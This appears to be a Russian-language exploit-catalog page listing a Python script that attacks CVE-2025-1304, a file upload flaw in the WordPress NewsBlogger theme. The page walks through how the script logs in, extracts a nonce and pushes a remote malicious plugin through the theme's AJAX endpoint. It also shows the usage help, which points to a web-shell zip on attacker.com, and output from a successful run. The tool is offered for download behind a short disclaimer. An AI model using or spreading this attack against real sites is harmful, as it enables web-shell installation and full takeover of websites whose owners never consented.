Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-1304 — Тема WordPress NewsBlogger <= 0.2.5.1 уязвима для произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-1304
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-1304

CVE-2025-1304

Тема WordPress NewsBlogger <= 0.2.5.1 уязвима для произвольной загрузки файлов

Репозиторий
21 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 WordPress NewsBlogger Theme <= 0.2.5.1 - Произвольная загрузка файлов (CVE-2025-1304)

CVSS Score: 8.8 (Высокий)
Vulnerability Type: Произвольная загрузка файлов
Component: Тема WordPress
CVE ID: CVE-2025-1304


🔥 Обзор уязвимости

Тема WordPress NewsBlogger (версии <= 0.2.5.1) уязвима к произвольной загрузке файлов через панель приветствия администратора.

Эта уязвимость позволяет любому аутентифицированному пользователю, включая тех, у кого минимальная роль Подписчик, загрузить вредоносный .zip-архив, содержащий веб-шелл.
Загрузка происходит через непроверенное поле URL плагина, которое не может должным образом проверить содержимое или тип загружаемого файла.

Успешная атака может привести к полной компрометации веб-сайта, включая удаленное выполнение команд и повышение привилегий.


🧠 Детали скрипта

Этот скрипт Python автоматизирует эксплуатацию уязвимости путем:

  • Входа с использованием предоставленных учетных данных администратора.
  • Динамического извлечения nonce из уязвимой страницы приветствия.
  • Загрузки удаленного вредоносного плагина через уязвимую конечную точку AJAX.

⚙️ Инструкции по использованию

root@kitploit:~
python CVE-2025-1304.py -h
root@kitploit:~
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB

Тема WordPress NewsBlogger уязвима к произвольной загрузке файлов #Автор: Nxploited (Khaled Alenazi)

options:
  -h, --help                показать это справочное сообщение и выйти
  --url, -u URL             Базовый URL цели (напр., http://target/wordpress)
  --username, -un USERNAME Имя пользователя администратора WordPress
  --password, -p PASSWORD   Пароль администратора WordPress
  --shellweb, -shell SHELLWEB
                           Прямой URL на вредоносный zip-архив с шеллом (напр., http://attacker.com/shell.zip)

📤 Пример вывода

root@kitploit:~
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}

⚠️ Отказ от ответственности

Этот код предоставлен только для образовательных и авторизованных тестов безопасности.
Автор не несет ответственности за любое неправомерное использование или ущерб, причиненный этим инструментом.


Автор: Nxploited (Khaled Alenazi)

Скачать инструмент